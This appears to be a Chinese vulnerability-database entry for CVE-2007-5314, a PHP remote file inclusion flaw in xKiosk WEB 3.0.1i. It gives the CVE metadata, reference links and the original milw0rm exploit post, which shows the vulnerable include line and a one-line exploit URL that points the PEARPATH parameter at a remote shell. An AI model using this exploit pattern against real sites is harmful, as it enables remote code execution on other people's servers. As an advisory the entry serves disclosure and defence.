XKiosk WEB 'xkurl.php' 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113753 漏洞类型 代码注入
发布时间 2007-10-08 更新时间 2007-10-09
CVE编号 CVE-2007-5314 CNNVD-ID CNNVD-200710-173
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/4502
https://www.securityfocus.com/bid/85340
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-173
|漏洞详情
xKioskWEB3.0.1i中的system/funcs/xkurl.php存在PHP远程文件包含漏洞,当register_globals被激活时,远程攻击者可以借助PEARPATH参数的一个URL执行任意PHP代码。
|漏洞EXP
xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability

Script : xKiosk WEB

Version : 3.0.1i

Download : http://xkiosk.net/xkiosk.3.0.1j.web.zip

AUTHOR : BorN To K!LL

Vuln Code :

include($PEARPATH.'Client.php');

3xpl0!T :

[p4th]/system/funcs/xkurl.php?PEARPATH=[-SHell-]

Greetings 2 :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ..

BorN To K!LL <> GoLd_M = 4ever ... =P

# milw0rm.com [2007-10-08]
|受影响的产品
Xkiosk Xkiosk Web 3.0.1I
|参考资料

来源:MILW0RM
名称:4502
链接:http://www.milw0rm.com/exploits/4502
来源:SECUNIA
名称:27140
链接:http://secunia.com/advisories/27140
来源:OSVDB
名称:37620
链接:http://osvdb.org/37620
来源:XF
名称:xkioskweb-xkurl-file-include(37030)
链接:http://xforce.iss.net/xforce/xfdb/37030
来源:VUPEN
名称:ADV-2007-3427
链接:http://www.frsirt.com/english/advisories/2007/3427